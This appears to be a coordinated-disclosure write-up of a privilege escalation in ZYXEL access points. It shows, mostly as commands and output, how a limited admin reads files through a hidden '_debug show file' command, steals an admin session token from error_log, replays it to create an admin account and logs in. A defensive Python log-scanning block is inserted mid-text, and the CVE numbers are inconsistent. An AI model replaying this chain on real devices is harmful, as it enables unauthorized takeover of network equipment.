
    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point

    February 20, 2025

    "Two things are infinite: the universe and human stupidity,
    but I’m not sure about the universe."
    – Albert Einstein


    📌 Note

    This is an excerpt from the official writeup sent to ZYXEL,
    which does not include CVE-2023-37926.


    Summary

    During my audit, I noticed that a user with a "limited-admin" account, after logging in via SSH or the Web Console on a ZYXEL ZyWALL ATP/USG device, could access sensitive system files and extract data such as passwords, emails, and user access tokens, or even compromise the system by causing a denial of service.

    Access to the Device as a Limited User

    rainpwn@0xdeadc0de:~$ ssh 192.168.1.1 -l limited
    Password:
    Router> # Hello ZySH!

    Limited Admin Attempting to Dump Admin Account Info

    Attempting to dump the admin account info; sensitive data is masked.

    Router> show username admin
    username : admin
    password : ****
    description : Administration account
    email 1 : xxxx@xxxx.xxx.xx
    mail1-verify : ****
    email 2 : xxxx@xxxx.xxx.xx
    mail2-verify : ****
    mobile : ****
    phone-verify : ****
    google-verify : N/A
    twoFA-auth-method : default(google-auth)
    user type : admin
    time setting : manual
    lease time : 30
    re-auth time : 0
    password date : 2023/07/04
    create date : Built-in
    reference count : 0
    Router>

    Limited Admin Attempting to Access Configuration File

    Router> show running-config
    Retval = -3041
    ERROR: Insufficent privilege.
    Router> copy running-config /conf/temp.conf
    Retval = -3401
    ERROR: Insufficent privilege.
    Router>

    ZYSH Debug command

    The ZYSH shell has multiple debug commands, the most important of which are restricted to a debug account. However, there is an unindexed command called _debug. It accepts subcommands such as show file, which returns a list of files that can be viewed without restriction, and running _debug show file [file] prints the contents of the given file. Many sensitive files are accessible, but for this scenario I will highlight two examples:

    Example Output:

    Router# _debug show file
    *** OTHER FILES HERE 
    /db/etc/zyxel/ftp/conf/startup-config.conf
    *** OTHER FILES HERE 
    /var/log/error_log
    *** OTHER FILES HERE
    Router#

    Viewing the Device Configuration

    Router> _debug show file /db/etc/zyxel/ftp/conf/startup-config.conf
    ! saved at 2023-07-04 14:44:25
    ! model: ATP700
    ! firmware version: 5.36(ABTJ.2)
    !
    language English
    !
    hardware-watchdog-timer start
    [..] etc etc

    Token Impersonation

    By executing _debug show file /var/log/error_log, we can obtain a list of authentication logs, including tokens:

    [Tue Jul 04 18:10:49.201590 2023] [:error] [pid 11465] [client ***:21279] Users: 
    admin:http/https (****) (0Z73d1trMF88CvdEztubbXhX8+sRzrjZqbeYctTZoxgXYIXOAKz6cyWH
    4+0trWbO:0Z73d1trMF88CvdEztubbXhX8+sRzrjZqbeYctTZoxgXYIXOAKz6cyWH4+0trWbO) is valid
    and grant access, referer: https://REDACTED/ext-js/index.html
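    The error_log entry above is exactly what a defender would want to catch in any log export reachable through _debug show file: a successful web login record that carries the live session token in clear. As an added example (not part of the original writeup or of ZYXEL's code), the following Python parses lines in that format, raises an alert for each token-bearing entry, and returns a redacted copy safe to forward to a SIEM. The sample log lines, client address, referer and token value are constructed placeholders.

```python
import re

# Apache-style error_log record as shown in the writeup: the session token
# appears twice, as "(TOKEN:TOKEN)", right after the masked credential field.
AUTH_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[:error\] \[pid (?P<pid>\d+)\] \[client (?P<client>[^\]]+)\] "
    r"Users:\s*(?P<user>[^:]+):(?P<method>\S+) \((?P<masked>[^)]*)\) "
    r"\((?P<token>[^:)]+):(?P<token2>[^)]+)\) is valid and grant access, "
    r"referer: (?P<referer>\S+)$"
)

# Constructed sample lines (placeholder address, hostname and token, not real values).
SAMPLE_LOG = [
    "[Tue Jul 04 18:10:49.201590 2023] [:error] [pid 11465] [client 10.0.0.5:21279] "
    "Users: admin:http/https (****) (CONSTRUCTEDTOKEN0123456789:CONSTRUCTEDTOKEN0123456789) "
    "is valid and grant access, referer: https://router.example/ext-js/index.html",
    "[Tue Jul 04 18:11:02.000000 2023] [:error] [pid 11465] [client 10.0.0.5:21280] "
    "File does not exist: /var/www/favicon.ico",
]

def parse_auth_line(line: str):
    """Return the parsed fields of a token-bearing auth record, or None for other lines."""
    m = AUTH_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # The record repeats the session token; treat a matching pair as a confirmed exposure.
    rec["token_leaked"] = rec["token"] == rec["token2"]
    return rec

def redact_line(line: str) -> str:
    """Replace the token pair with a fixed marker; unrelated lines pass through unchanged."""
    rec = parse_auth_line(line)
    if rec is None:
        return line
    return line.replace(f"({rec['token']}:{rec['token2']})", "([REDACTED]:[REDACTED])")

def scan_log(lines):
    """Return (alerts, sanitized_lines): one alert per exposed session token."""
    alerts, sanitized = [], []
    for line in lines:
        rec = parse_auth_line(line)
        if rec and rec["token_leaked"]:
            alerts.append({"ts": rec["ts"], "user": rec["user"],
                           "client": rec["client"], "referer": rec["referer"]})
        sanitized.append(redact_line(line))
    return alerts, sanitized

if __name__ == "__main__":
    found, clean = scan_log(SAMPLE_LOG)
    print(f"{len(found)} token exposure(s) found")
    print("\n".join(clean))
```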

    Using this token, it is possible to send POST requests to https://REDACTED:PORT/cgi-bin/zysh-cgi to execute commands as an impersonated admin.

    With an invalid auth token, the web server replies with a 302 status code.

    rainpwn@0xdeadc0de:~$ ./zysh.sh "FAKETOKEN" "show users current;"
    <!DOCTYPE HTML PUBLIC "-//IETF //DTD HTML 2.0//EN">
    <html><head>
    <title>302 Found</title>
    <herad><body>
    <h1>Found</h1>
    <p>The document has moved <a href="/">here</a>.</p>
    </body></html>

    With a valid one, it prints the command output.

    rainpwn@0xdeadc0de:~$ ./zysh.sh "0Z73dM[...]0trWbO" "show users current;"
    No: 1
      Name: admin
      Type: admin
      From: REDACTED
      Country_Code: IT
      Country_Name: Italy
      [...]
      Login_Time: 00:01:06
      [...]
      Unique: 0Z73d1tr8[...]+0trWbO
    
    rainpwn@0xdeadc0de:~$

    Creating an Admin Account and Gaining Access

    rainpwn@0xdeadc0de:~$ ./zysh.sh "0[..]bO" "username rain password 1234 user-type admin"
    var zyshdata0=[];
    var errno0=0;
    var errmsg0='OK';
    rainpwn@0xdeadc0de:~$

    Logging in via SSH with the "Hacked" Account

    rainpwn@0xdeadc0de:~$ ssh 192.168.1.1 -l rain
    Password:
    Router# # We got our admin Account!!

    Disclosure

    • 2023-07-05: ZYXEL was notified via <security@zyxel.com.tw>
    • 2023-07-06: ZYXEL acknowledged my vulnerability report.
    • 2023-07-19: ZYXEL assigned CVE-2023-37925 and CVE-2023-37926 to the reported issues and informed me of their intention to publish their security advisory on 2023-11-28.
    • 2023-11-28: ZYXEL published their security advisory, following our coordinated disclosure timeline.